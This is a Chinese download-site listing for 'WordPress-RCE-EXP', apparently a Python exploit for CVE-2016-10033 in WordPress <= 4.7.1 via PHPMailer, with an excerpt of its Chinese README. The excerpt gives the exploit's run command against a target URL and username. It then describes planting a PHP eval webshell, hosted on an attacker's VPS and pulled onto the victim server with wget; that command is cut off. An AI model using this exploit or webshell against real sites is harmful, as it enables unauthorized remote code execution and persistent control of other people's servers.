WordPress-RCE-EXP

时间:2024-04-30 16:30:02
【文件属性】:

文件名称:WordPress-RCE-EXP

文件大小:2KB

文件格式:ZIP

更新时间:2024-04-30 16:30:02

Python

WordPress-RCE-EXP 影响版本 漏洞编号:CVE-2016-10033 (基于) WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用 出现 Test_blind_shell>>> 后,说明网站存在RCE漏洞 有两种方式来漏洞利用 一、写入Webshell 1.在vps上开web服务,在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址,前面不能加http://) Test_blind_shell>>>/usr/bin/wget --


【文件预览】:
WordPress-RCE-EXP-main
----wp-rce-exp.py(1KB)
----README.md(1KB)

网友评论